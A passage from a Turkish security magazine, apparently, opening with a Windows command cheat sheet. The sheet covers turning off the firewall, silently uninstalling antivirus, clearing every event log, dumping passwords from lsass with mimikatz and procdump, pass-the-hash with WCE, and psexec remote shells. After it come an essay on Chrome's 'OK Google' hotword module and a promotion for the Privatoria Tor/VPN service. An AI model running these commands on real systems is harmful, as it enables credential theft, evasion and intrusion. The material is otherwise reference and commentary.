75 Güvenlik duvarı işlemleri netsh firewall set service remotedesktop enable netsh firewall show opmode netsh firewall add portopening TCP Portunu Acan Kural Enable All netsh firewall show portopening netsh advfirewall show allprofiles netsh advfirewall set allprofiles state off netsh advfirewall set currentprofile state off netsh firewall set logging droppedpackets = enable netsh firewall set logging connections = enable Logların düştüğü dizin: %systemroot%system32logfilesfirewallpfirewall.log Programlar ve özellikler wmic product get name wmic product where name= Kaspersky Internet Security call uninstall /nointeractive Dism.exe /online /Get-Features /Format:Table Dism.exe /online /Enable-Feature /Featurename:TFTP pkgmgr /iu: TelnetClient Başlangıç programları wmic startup get name, user, location Güncelleme işlemleri wusa /uninstall /kb: /quiet /norestart wmic qfe where HotFixID= KB get HotFixID Caption,

76 Log işlemleri wevtutil qe Application /c:10 /rd:true /f:text for /F tokens=* %G in ( wevtutil.exe (wevtutil.exe cl %G ) el ) DO Başka bir kullanici gibi komut çalıştırma runas /env /user:sirket\levent.altayli cmd psexec -s cmd.exe Oturumu kilitleme rundll32.exe user32.dll, LockWorkStation Dosya kopyalama copy D:\netcat.exe C:\Users Parolaları RAM üzerinden elde etme mimikatz > privilege::debug > sekurlsa::logonpasswords mimikatz sekurlsa::logonpasswords full exit procdump -accepteula -ma lsass.exe lsass.dmp mimikatz > sekurlsa::minidump lsass.dmp > sekurlsa::logonpasswords wce -w wce -s WORKGROUP:Administrator:<LM>:<NTLM> Grup ilkesi işlemleri

77 gpupdate gpresult gpresult gpresult /force /z /H Politika.html /USER Ferdi.Murathan /SCOPE COMPUTER /Z Posta işlemleri dsquery user -name user name dsget user -samid - -display Get-Mailbox fl name, addresses Get-QADUser -SizeLimit 0 -Enabled - * SelectObject DisplayName, Etki alanı güven ilişkileri nltest /domain_trusts > Tüm güven ilişkilerini listeler nltest /dcname:sirket > Belli bir etki alanındaki PDC sunucusunu sorgular. ([System.DirectoryServices.ActiveDirectory.Forest]::GetC urrentforest()).domains > Forest (Orman) içerisindeki tüm etki alanları listelenir. ([System.DirectoryServices.ActiveDirectory.Domain]::GetC urrentdomain()).getalltrustrelationships() > Mevcut etki alanı için tüm güven ilişkileri (Parent-Child, 2 yönlü vs) listelenir. Oturum açan etki alanı hesabının bilgileri Get-EventLog security newest WhereObject{$_.Message -like *Galip.Tekinli* } format-list Message > GalipTekinliHesabininActigiOturumBilgileri.txt Not: Belirtilen komut çalıştırılmalıdır. etki alanı denetleyicisinde (DC)

78 Diğer komutlar shutdown /r /t 0 /f Uzak Bilgisayar İşlemleri > Uzak bilgisayar için sistem bilgileri psinfo \\ h -s -d systeminfo /S /U Ornek\Murat /P Aa Uzak bilgisayarın paylaşımına erişim net use K: \\ \C$ /USER:SIRKET\Hakki.Leventli Hh net use K: /delete Uzak bilgisayarın komut satırına erişim psexec Hh psexec Hh \\ u SIRKETHakki.Leventli cmd.exe /accepteula \\ u SIRKETHakki.Leventli -c -f \\ \Paylasim\Uygulama.exe -p -p Uzaktaki bilgisayarda çalışan prosesler tasklist /V /S /U SIRKETVeli.Kut /P 1907?Fenerbahce Uzak bilgisayardaki kayıt değerleri

79 reg query \\ \HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit Uzak bilgisayarda açık olan oturumlar query session /server:dcsunucusu reset session 3 /server:dcsunucusu Uzak bilgisayarda zamanlanmış görevler net time \\ at \\ :32 Betik.bat Uzak bilgisayardaki dizinin kopyalanması xcopy /s C:\KopyalanacakDizin \PaylasimKlasoru Diğer komutlar shutdown /m \\ /r /t 10 /f /c Bilgisayar 10 saniye icinde kapatiliyor Kaynaklar:

80 tems-running-domain-admin-processes/ erpowershell/thread/eaff2f69d17b f8a-9f42840cac56/ ll-security-features-in-remote.html l -dead-long-live-pass-the-hash/ u-k1whtjm4fgg3joiuz43rw/edit?hl=en_us# c-spraywmi-is-here/ Google Chrome Ortam Dinlemesi mi Yapıyor? Geçtiğimiz haziran ayında yerli ve yabancı basında görmüş olabileceğiniz üzere Google Chrome web tarayıcısının ortam dinlemesi yapıyor olabileceğine dair bazı iddialar gündeme geldi. Ülkemiz basınının bunun gibi teknik konulara yaklaşımındaki tutumu maalesef magazin haberi seviyesinin ötesine geçemiyor. Bu yazıda geleceğimizi de ilgilendiren bu konuyu incelemeye çalışacağız. Açık kaynak kod ve özgür yazılım Öncelikle konuya yabancı olanlar için bazı kavramlara kısaca değinmemizde fayda var. Her yazılım kaynak kodlardan oluşur.

81 Yazılım kaynak kodları insanlar için anlamlıdır, bilgisayarınızın için de anlamlı olması için derleyici adını verdiğimiz araçlarla makine diline (obje koduna) dönüştürülmeleri gerekir. İnternet üzerinden indirdiğiniz ve bilgisayarınızda çalışmaya hazır haldeki yazılımlar, makine diline dönüştürülmüş halde bulunurlar. Dolayısıyla bu dosyaların içerisini açıp baktığımızda sadece makine dilindeki obje kodlarını görürüz ve bu noktadan hareketle yazılımın kaynak kodlarına ulaşmak mümkün değildir. Açık kaynak kodlu yazılım geliştirme modelinde, yazılım kaynak kodları internet üzerinde herkese açık halde bulundurulur. Dileyen herkes kaynak kodları inceleyebilir, bilgisayarına indirebilir ve üzerinde çalışabilir hatta projeye katkıda bulunabilir. Örneğin açık kaynak kod modeli ile geliştirilen OpenOffice uygulamasının tüm kaynak kodlarına erişebilirken bunun karşıtı olan kapalı kod yöntemiyle geliştirilen Microsoft Office uygulamasının kaynak kodlarına erişmeniz mümkün değildir. Açık kaynak kodlu yazılımların çoğunluğu özgür yazılımlardır ancak her açık kaynak kodlu yazılım aynı zamanda özgür yazılım olmak zorunda değildir. Açık kaynak, bir yazılım geliştirme yöntemi iken özgür yazılım sosyal bir harekettir. Açık kaynak kodlu geliştirme modeli öncelikli olarak yazılımın teknik açıdan daha iyi hale getirilmesiyle ilgilenirken özgür yazılım konuyu toplumun tüm kesimleri için yaşamsal öneme sahip temel hak ve özgürlükler kapsamında inceler. Açık kaynak modeliyle geliştirilen yazılımların da mutlaka bir lisansı bulunur. Çoğu projede bu amaçlarla hazırlanmış belli başlı lisans modellerinden biri kullanılır [1]. Bu lisansların bazıları, özgür yazılım noktasından bakıldığında yeterince özgür olarak değerlendirilmez. Örnek olarak bunlardan biri olan BSD Lisans modeli, ticari firmaların açık kaynak kodlu projede geliştirilen kodları baz alarak üzerine bir miktar ek kod daha yazmalarına ve yapılan eklemelerin kapalı olarak kalmaya devam ettiği ürünler çıkarmalarına izin vermektedir.

82 Google Chrome ve Chromium projesi Chromium, Google tarafından açık kaynak kod geliştirme modeli ile başlatılan ve özellikle başlangıç aşamasında çoğunluğu Google çalışanlarından oluşan yazılımcılar tarafından, BSD lisans modeli ile geliştirilen bir web tarayıcı platformu projesidir. Projenin temel amacı hızlı çalışan ve güvenilir bir web tarayıcısı geliştirmektir. Lisansı uygun olduğu için Google, proje kapsamında geliştirilen açık kaynaklı yazılımı baz alarak üzerine kendi geliştirdiği kapalı kodlu bileşenleri de eklemekte ve ortaya Google Chrome web tarayıcısı çıkmaktadır. Chromium projesi sadece Google Chrome tarafından değil, Yandex Browser, Qt Web Engine vb. gibi çok sayıda farklı uygulama ve kütüphane içerisinde de kullanılmaktadır. Aynı zamanda Debian, Ubuntu gibi çeşitli Linux dağıtımları içerisinde Google Chrome dan farklı olarak bu projeden üretilmiş, chromium adında bir web tarayıcı paketi de bulunmaktadır. Google Chrome bir özgür yazılım değildir. Google Chrome yerine Linux dağıtımları ile birlikte gelen chromium uygulamasını kullandığınızda, Google tarafından eklenen kapalı kodlu bileşenlerden uzak durmuş olursunuz. Yazının devamında Google Chrome ile firma tarafından geliştirilen web tarayıcısını, Chromium ile projenin kendisini, chromium ile de Linux dağıtımları tarafından aynı projeden üretilen ancak kapalı kodlu bileşenler içermeyen web tarayıcı uygulamasını kastediyor olacağız. Problemin farkedilişi 26 Mayıs 2015 te Yoshino Yoshihito # kayıt numarasıyla Debian Hata Takip sistemi üzerinde yeni bir hata kaydı oluşturdu. Bu hata bildirisinde özetle chromium uygulamasını 43. versiyona güncelledikten sonra sistemin kendisinden onay istemeksizin Chrome Hotword Shared Module adı verilen bir eklentiyi indirdiğini ve tarayıcısının adres satırına

83 chrome://voicesearch yazmak suretiyle ilgili eklenti hakkında ek bilgi aldığında, Auido Capture Allowed iznine sahip olduğunu, dolayısıyla mikrofona erişim imkanı bulunduğunu iletiyordu.bu hata raporunun yayınlanmasının ardından pek çok kişi aynı durumu teyit eden bilgiler paylaştı. Peki tüm bunlar ne anlama geliyor ve bizim için sorun nerede başlıyor? Google Sesle Arama Teknolojisi Muhtemelen pek çoğunuz Google un sesle arama özelliğini bilgisayarınızda veya cep telefonunuzda denemişsinizdir. Bu özellik öncelikle sesle arama yapmak istediğinizi belirten bir butona tıklandıktan yada telefonda bu iş için yapılmış özel uygulamayı açtıktan sonra çalışmaya başlıyor. Mikrofondan kayıt edilen sesiniz analiz için Google sunucularına gönderiliyor ve burada daha önce kaydedilmiş desenlerle karşılaştırılıyor. Gelişmiş ses tanıma fonksiyonlarını cep telefonu veya kişisel bilgisayar üzerinde doğrudan çalışacak düzeye indirmek günümüzde halen yeterince uygulanabilir değil. Bu yüzden analiz için bulut tabanlı sunucu kümelerinin kullanılması kaçınılmaz. Google ses tanıma teknolojisinde kaydedilen ses desenini daha doğru algılayabilmek için, insan beyninin bilgi işleme yönteminden esinlenerek geliştirilen yapay sinir ağları modellerini kullanır. Google bu noktada sık yapılan arama sorguları ve arama motorunun çalışması için önceden analiz etmiş olduğu web içeriğinin kendisi gibi sahip olduğu devasa verinin avantajını, N-gram modeliyle ses tanıma sürecini iyileştirmek için kullanıyor. N-gram modeli, N. kelimenin (N-1) yani bir önceki kelimenin ne olduğuna göre olasılığının bilindiği durumlar için geliştirilmiştir. Örneklemek gerekirse, eğer hafta sonu şeklindeki 2 kelimeden sonra bir 3. kelime daha gelecek ise, bu kelimenin matematik ya da kahvaltı olması arasında olasılık açısından bir fark vardır. Örneğimizdeki 3. kelimeyi tahmin etmedeki başarı oranını artırmak için elimizde

84 3-gram modelini besleyecek verilerin de bulunması gerekir. Açıklanan rakamlara göre 2012 yılında Google ses tanıma için, 5-gram modelini (yani 5 ardışık kelimeye kadar) ve toplamda 12 milyar civarında N-gram kümesini kullanmaktaydı. Bugün bu sayıların hangi düzeye ulaştığını kesin olarak bilemesek de ciddi oranda artmış olduğunu varsayabiliriz. Ek olarak bunun statik bir model olmadığını ve öğrenmeye devam ettiğini de belirtmemiz gerekir. Konudan biraz uzaklaştık gibi görünebilir ancak bu detay, kaydedilen sesin neden Google sunucularına gönderildiğini anlamak için gerekli. Yukarıda bahsedilen büyük veri kümeleri üzerinde çalışıp kendi kendine öğrenmeye devam eden algoritmaların kısa sürede yanıt üretebilmesi, ancak birden çok sunucu üzerinde çalışmasıyla mümkündür. Günün birinde kişisel bilgisayarlarımız bu işlem gücü için gereken kapasiteye ulaşsa dahi elimizde analiz için gereken diğer büyük veritabanı bulunmayacağından Google hep bir adım önde olacaktır. Sesle arama yapabilmenin nesi kötü? Sesle arama uzun zamandır Google ürünü olarak hayatımızda ancak Google Chrome versiyon 43 ve sonrasında bu süreç bir adım daha ileriye götürülerek, OK Google adıyla yeni bir modelle desteklenmiş. Bu özellik tarayıcınızda Google ana sayfasına girdiğinizde veya bir adrese gitmek için yeni bir sekme açtığınızda önce OK Google ardından aramak istediğiniz kelimeleri söylemek suretiyle çalışıyor. Yani sesle arama yapmak için özel bir butona tıklamak yerine, OK Google kelimelerini telaffuz ederek ses tanıma sürecini harekete geçirmiş oluyorsunuz. Özellikle tablet vb. cihazlarla kullanım alışkanlıklarının değişmeye başladığını ve daha az klavye kullanır olduğumuzu düşünecek olursak, hayatımızı kolaylaştıracak bir özellik olduğunu söyleyebiliriz.

85 Bu özelliğin çalışabilmesi için sistemimizin sürekli olarak ortamdaki sesleri dinlemesi ve OK Google kelimelerini yakalaması gerekiyor. Buradaki analiz, kelime sayısı sadece 2 olduğundan ve belirli bir ses deseni içerdiğinden sizin bilgisayarınızda yapılmakta, Google sunucularına herhangi bir veri gönderilmemektedir. Devamındaki analiz ise yukarıda değindiğimiz şekilde sunucular üzerinden yapılacaktır. Dolayısıyla daha hızlı arama yapabilmenizi sağlamanın yolu sizi sürekli dinlemekten geçiyor. Üstelik bu dinleme yapılırken mikrofonunuzun kullanımda olduğuna dair bir bildirim de almıyorsunuz. Google ekibinden yapılan açıklamada [2], OK Google arama özelliğinin sadece bu özelliği aktifleştirmiş kullanıcılarda ve yeni sekme açıldığında veya Google ana sayfasına girildiğinde devreye girdiği belirtildi. Bu açıklamayı doğru kabul etsek de, şu soruları sormak zorundayız: Özelliği devre dışı bıraktığımızda, herhangi bir anda kendiliğinden devreye girmeyeceğine yönelik Google tam bir garanti veriyor mu? Verse dahi buna ne kadar güvenebiliriz? Daha kötüsü, Google bizim hakkımızda pek çok diğer veriye sahip olduğuna göre spesifik olarak belirli bir kişinin bilgisayarındaki dinleme özelliğini aktifleştirmediğinin garantisi var mıdır? Sadece kendi bilgisayarımızda uzun süre test yapsak dahi bundan emin olma şansımız bulunmuyor. Sorunlar burada bitmiyor, daha kötüsü de var. Bu özelliği Ayarlar menüsünden devre dışı bırakmış olsanız bile, adres çubuğuna chrome://memory-redirect yazdığınızda çıkan detaylı listenin sonlarına doğru bakacak olursanız, Extension Hotword Triggering kodunun çalışır durumda olduğunu ve belirli bir bellek tükettiğini göreceksiniz. Yani aksini belirtmiş olmanıza rağmen ilgili modül arka planda

86 çalışıyor ancak yapmış olduğunuz seçim nedeniyle mikrofon üzerinden bir dinleme gerçekleştirmiyor. Peki buna neden güvenelim? Kullanmak istemediğim bu özellik neden pasif durumda arka planda çalışmaya devam ediyor? Şimdi en önemli soruna geliyoruz. Tüm bu Hotword Triggering modülü obje koduyla yani makine dili ile bilgisayarınıza indiriliyor. Geliştirmesi ise Google tarafından kapalı kod modeliyle yapıldığından Hotword Triggering modülünün ne yaptığını, kaynak kodlarına bakarak inceleme şansımız bulunmuyor. Üstelik kodlarını denetleyemediğimiz bu bileşen otomatik olarak, herhangi bir talep olmaksızın tüm Chrome yüklü sistemlere yükleniyor. Google a böyle bir işlemi neden onay almaksızın yaptığı sorulduğunda ise, sesle aramayı temel kullanıcı deneyiminin bir parçası olarak gördüklerini ve seçimlere bağlı olmaksızın tarayıcının ana fonksiyonları arasına dahil edilmesi gerektiğini düşündüklerini söylüyorlar [2]. Google açıklamasında Hotword Triggering özelliğinin doğrudan çalıştırılabilir bir modül olmadığını, NaCl (Native Client Plugin) yöntemiyle çalıştığını ve bir web sitesi gezinilirken ne kadar güvenli bir ortam sağlanıyorsa aynı kurallarla sınırlandırıldığını dolayısıyla bilgisayarınızdaki diğer verilere erişilebilmesi gibi bir sorun yaratamayacağını, tek farkın mikrofona doğrudan erişim imkanı olduğunu da eklemiş. Bunu şöyle de tercüme edebiliriz; bizim kontrolümüz dışında burada bir zaafiyet olsa bile sisteminize ciddi zararlar verilemez, ancak mikrofon üzerinden bulunduğunuz ortam dinlenebilir. Pek güzel! Daha da sıkıntı yaratan durum şu ki, Google bunu sadece kendi Chrome tarayıcısında değil, Chromium projesi içerisinden üretilen ve Debian vb. Linux dağıtımlarında kullanılan, kapalı kodlu bileşen içermeyen chromium tarayıcısında da yapıyor. Bunun mümkün olabilmesi için gereken yazılım değişikliklerini,

87 çok dikkat çekmeden açık kaynak kod modeliyle geliştirilen Chromium projesi içerisine dahil etmeyi başarmış. Google ekibinden yapılan açıklamada [2] bu duruma kısaca şu şekilde değiniliyor: Dağıtımların Chromium projesinden üretmiş olduğu tarayıcılardan biz sorumlu değiliz. Madem ki bu dağıtımlar özgür yazılım konusunda kendilerine özgü daha hassas politikalara sahipler, o zaman Chromium projesinden ürettikleri tarayıcıların hangi özellikler dahil edilerek oluşturulduğuna da dikkat etsinler! Tüm sorumluluk onlara aittir, bizim bu konuda yapabileceğimiz bir şey bulunmuyor. Söyledikleri doğru fakat bu kadar büyük bir açık kaynak kodlu proje içerisine böyle bir özelliği otomatik indirecek şekilde kod ekliyor olmak, sonrasında da madem öyle siz devre dışı bırakıp o şekilde bir tarayıcı üretseydiniz demek en hafif tabirle biraz fazla kurnazca kalıyor. Gelecek itirazların herkesin malumu olduğu böylesi bir fonksiyon geliştiriyor iseniz, üretilen yazılımda öntanımlı olarak devre dışı bırakılmasını, sadece özellikle seçildiğinde devreye alınmasını sağlıyor olmanız genel kabul görmüş bir pratiktir. Ancak burada bu süreç uygulanmamıştır. Daha sonra yaptıkları açıklamada ise Chromium versiyon 45 ve sonrasında bu özelliğin ön tanımlı olarak devre dışı bırakılacağını iletip geri adım atmak durumunda kaldılar. Google ın tümüyle iyi niyetli olduğuna inanamaz mıyız? İnanabilirsiniz ve belki öyle de olabilir. Bir an için, Google ın NSA (Ulusal Güvenlik Ajansı) ve ABD devlet kurumlarıyla ne kadar gönüllü işbirliği içerisinde olduğuna dair Snowden in yazdıklarını tümüyle yok saydığımızı varsayalım [3].

88 OK Google seçeneği kapalıyken bile aslında arka planda çalışmaya devam eden bu modülde herhangi bir güvenlik zaafı varsa birileri bunu Google ın da kontrolü dışında kullanamaz mı? Cevabımız evet, kullanabilir şeklinde olacaktır. Bir düşünün, şu an yüz milyonlarca Chrome web tarayıcısı çalıştıran bilgisayarın mikrofonuna erişmek ve ortam dinlemesi yapmak mümkün olabilir. Aksinden nasıl emin olacağız? Tüm iyi niyetli yorumlarımızda dahi önemli bir güvenlik zaafiyeti olasılığı önümüzde duruyorken buna bir de Google ın o kadar da iyi niyetli olmayabileceği senaryosunu eklemeyi deneyelim. Buradan hareketle ulaşacağımız nokta, ortam dinlemelerinin istenen zamanlarda belirli kişilere yönelik olarak aktifleştirilip geri kalan zamanlarda normal çalışmasına devam ettiği bir model olabilir. Şüphe duymamak mümkün olmadığı gibi aksi yönde emarelerle daha sık karşılaşmaya başladığımızı söyleyebiliriz. Örneğin şu an Yahoo nun CEO su olan Marissa Mayer 2012 yılında Google da üst düzey yönetici iken, The Telepgraph için verdiği bir röportajda [4], Google ın büyük hedefinin sezgisel arama olduğunu söylüyor ve ekliyor: Asıl amacımız, kullanıcı daha ne arayacağını bile düşünmemişken ona uygun sonuçları bulup göstermek ve şu an geldiğimiz noktada bunun çok da uzağında değiliz Yani leb demeden leblebiyi anlamak istediklerini söylüyorlar. Kulağa çok hoş geliyor! Açık yazılımlar güvenli değil miydi? Yazılım güvenliği çok katmanlı bir konudur ve bir yazılımın herhangi bir özelliği veya katmanı asla tek başına mutlak güvenliği sağlayamaz. Yazılımın açık kaynak kodlu geliştiriliyor olması, kaynak kodlarının herkes tarafından incelenebilmesi nedeniyle içerdiği zaafiyetlerin ticari bir firmaya bağımlı kalınmaksızın erken tespiti ve çözüm üretimi

89 imkanını sağlar, daha fazlasını değil. Bununla birlikte Chromium gibi büyük bir yazılım projesinde bazı zararlı olabilecek bileşenlerin farkedilmesi her zaman mümkün olmayabilir. Chromium örneğinde de bu değişiklikler gözden kaçmış ancak kısa süre içerisinde farkedilmiş ve Linux dağıtımları tarafından gerekli önlemler alınarak, chromium uygulamasının Hotword Triggering modülünü indirmesine olanak vermeyen bir versiyonu üretilmiştir. Eğer kapalı kodlu bir yazılım kullanıyor olsa idik muhtemelen bu sorunun ya hiç farkında olmayacak yada üzerinden uzun zaman geçtikten sonra tespit edebilecektik. Özetle, açık kaynak kodlu geliştirme modeli, yazılımın daha güvenli olabilmesine giden yolun önünü açıyorken, kapalı kodlu ticari modeller zaten tanımı gereği mevcut ortamın güvenliğini artırmaya yönelik herhangi bir katkıda bulunmuyor. Peki ne yapabiliriz? Bugün kullandığımız bilgisayarlardaki işletim sistemi ve temel uygulamaların kaynak kodlarının toplamı ortalama olarak milyon satır arasında bir büyüklüğe ulaşmış durumda. Bu kadar devasa bir kod yığını içerisinde potansiyel olarak pek çok güvenlik zaafiyeti olduğunu varsayabiliriz. Eğer bilgisayarımızda kullandığımız ve milyonlarca satır kaynak kodundan oluşan yazılımların tümü açık kaynak kod modeliyle geliştiriliyor olsaydı, teorik olarak büyük bir ekosistem sayesinde olası tüm güvenlik zaafiyetlerinin bulunması mümkün olabilirdi. Burada bahsedilen nedenlerden ötürü tümüyle açık kaynak kod ve özgür lisans modelleriyle geliştirilen yazılımlardan oluşan bir işletim sistemi kullanmaya karar verirseniz, Debian GNU/Linux dağıtımını bilgisayarınıza kurabilirsiniz [5]. Ancak kendim de bir Debian geliştiricisi olmama rağmen, herkesin bir anda Debian kullanmaya başlamasını önermem mümkün değil.

90 Bilgisayarla yaptığınız işlemlerde kullandığınız uygulamaların tümüne yönelik açık kaynak kod ve özgür yazılım dünyasında her zaman bir alternatif veya yeterince iyi bir alternatif bulmak mümkün değil. Bununla birlikte her geçen yıl bu oran özgür yazılımlar lehine artıyor hatta bazı kullanım biçimleri için tamamen özgür yazılımlardan oluşan bir sistemi kullanmayı olanaklı kılıyor. Günümüzde biraz da işin doğası gereği Google, Apple, Facebook, Oracle gibi bazı teknolojik firmalarla bir kartelleşme oluşmuş durumda. Bu durumun kısa veya orta vadede değişmesi de oldukça zor görünüyor. Google artık 1996 yılındaki idealist araştırma projesi değil; kâr etmesini bekleyen patronları, ortakları ve halka açık hisseleri var. Dolayısıyla kollektif bir bilinçle farkındalık yaratıp, ticari firma veya kurumların insan haklarıyla ilgili temel konulara müdahale olasılığı içeren geliştirmeleri söz konusu olduğunda gerekli kamuoyunun oluşturulmasına katkıda bulunmalıyız. Haklarımızı bilmek ve bunları şirketler üzerinde baskı yaratmak suretiyle talep ediyor olmak elbette çok önemli ancak konuya daha geniş bir perspektiften baktığımızda, bu gibi çalışmaların sınırlarının hukukla çizilmiş olması ve o hukukun da ticari çıkarlar, devlet güvenliği vb. gerekçelerle kurumlara boyun eğmemesi veya işbirliğinin önünü açmaması gerekiyor. Herhangi bir firma yada kurumun başta özel hayata saygı olmak üzere insan haklarının bir bölümünü ihlal ettiğinde, ciddi yaptırımlarla karşılaşması sağlanmalıdır. Devletler, firmalar ve diğer kurumların sundukları yazılım ürünlerinin de insan hakları standartlarına uygun olmasını garanti altına almalı, özgür yazılım ekiplerinin kullanıcıya erişimine yönelik destekler sunmalı ve tıpkı diğer ticari alanlarda olduğu gibi bilişim alanındaki kartelleşme sürecinde de en azından izleyici rolüyle yer almalıdır. Bu kadar büyümüş ve yoluna çıkan diğer küçük firmaları yutan

91 yapılara karşı yapabileceğimiz bir diğer eylem de özgür yazılım alternatiflerine yönelerek kullanım oranlarını düşürmek olabilir. Kullanım oranlarının azalması kârın da azalmasını sağlayacaktır. Bu da beraberinde hoşnut olmayan hissedarları ve politika değişimlerini getirebilir. Bunlar kulağınıza biraz romantik yaklaşımlar olarak geliyorsa bir daha düşünmenizi öneririm. Bir çoğumuz evden çıkarken cüzdanını unuttuğunda çok da önemsemeyip günlük rutinine devam edebiliyorken unutulan şey akıllı telefon ise, geri dönüp almak zorunda hissediyor! Böylesine bir dönüşüm için 10 yıl geçmesi bile gerekmemişken sürecin gelecekte nereye doğru evrileceğine kafa yormakta ve onu daha iyi bir şeye dönüştürmeye çalışmakta fayda var. Somut bir öneride bulunmak gerekirse, bilgisayarınızdan Google Chrome u kaldırın (Linux kullanıyorsanız güncellenmiş chromium paketlerini kullanmaya devam edebilirsiniz) ve Firefox gibi bir web tarayıcı kullanın. Bu olaydan başka bir yönden de ders çıkarılması gerekiyor. Bilgisayarımızdaki dahili mikrofon ve kamera aygıtlarının sadece yazılımla açılıp kapanabilmesinin yanında, elektriksel olarak da tamamen kapatılabilmesine imkan sağlayan fiziksel bir anahtar bulunması gerekiyor. Tıpkı bazı dizüstü bilgisayarlarda yer alan ve kablosuz ağ kartınızı kapatıp açmaya yarayan anahtar gibi, mikrofon ve kamerayı da kapatabilme imkanı sunan ve bu şekilde kapatıldığında yazılımsal olarak aygıta erişimi imkansız kılan bilgisayarların üretilmesi önemli bir ihtiyaç olarak görünüyor. Tüm bu olan bitene rağmen Google Chrome kullanmaya devam ediyorsanız, günün birinde özel bir konuşmanızla ilgili hakkınızda soruşturma açıldığında yada konuştuğunuz konuyla ilgili gün boyu reklam yağmuruna ve çeşitli yönlendirmelere maruz bırakıldığınızda şaşırmayın. Bu konuyu gözardı etmeniz, bu savaşı kaybetmemiz demek.

92 Desteğinden Hocamıza Dolayı Murat Demirten Teşekkür Ediyoruz Tor Üzerinden Privatoria VPN Servisi Geçtiğimiz günlerde ortaya çıkan yeni bir oluşum internette güvenli gezinme yöntemlerimiz arasına bir yenisini daha ekledi. Privatoria adıyla yayın hayatına başlayan bu firma Tor faaliyetlerini ve VPN hizmetlerini birleştirdiklerini duyurdu %100 sızıntı koruması sağladıklarıni bildirdi. Üye olmak ve sistemi denemek için bu adresden gereken adımları yapabilirsiniz.

93 Sadece Kullanıcı Adı tanımlayarak başlayacağınız işlemlerde dikkat edin Şifremi Unuttum gibi bir seçeneğiniz bulunmuyor.sistem tarafından otomatik bir şifreniz oluyor isterseniz değiştirebilirsiniz.ancak kesinlikle bilgilerinizi unutmayınız tekrar bilgilerinizi edinemezsiniz. Çek Cumhuriyeti nde konumlu olan Privatoria Kullanıcılarına 8 in 1 güvenlik çözümleri sunuyor.aşağıda bu çözümlere göz atabilirsiniz > 1. Tor Plus VPN Normal VPN hizmetinin yanında çıkışları TOR ağından yapmanıza olanak sağlıyor.bu hizmetde bant genişliği Tor ağında bağlı olduğunuz nodelerin durumuna

94 göre değişmektedir.oldukça güvenli bir yapısı bulunmaktadır.hızlı bir şekilde gezinemeyeceğinizi bilmenizde fayda var. 1. Secure VPN Normal VPN hizmetidir 22 farklı ülkede bulunan sunuculardan birisini seçip kolaylıkla kullanabilirsiniz.bu hizmetde bant genişliği ISP nizin size sunduğu hız ile sınırlıdır. 2. Web Proxy Tor Tarayıcınız ile Privatoria sunucusuna bağlanıp tor uygulamasını sisteminize kurmadan Deep Web ve güvenli gezinmeniz için kullanabileceğiniz yapıdır.nodelerin durumuna göre proxy hızları değişmektedir. 3. Anonymous Proxy Privatoria firmasının sunmuş olduğu güvenli gezinme yollarından bir tanesidir.tarayıcınız üzerinden ayarlayarak gezdiğiniz sitelerde güvenliğinizi arttırabilirsiniz. 4. Anonymous Privatoria firmasının anonim olarak mail göndermek ve almak için kullanmanıza olanak tanıyan hizmetdir.web üzerinden kullanabileceğiniz gibi herhangi bir mail işlemcisi ilede kullanabilirsiniz Önerilen işlemci Mozilla Thunderbird olarak belirlenmiştir. 5. Secure Cloud Storage Güvenli bir şekilde dosyalarınızı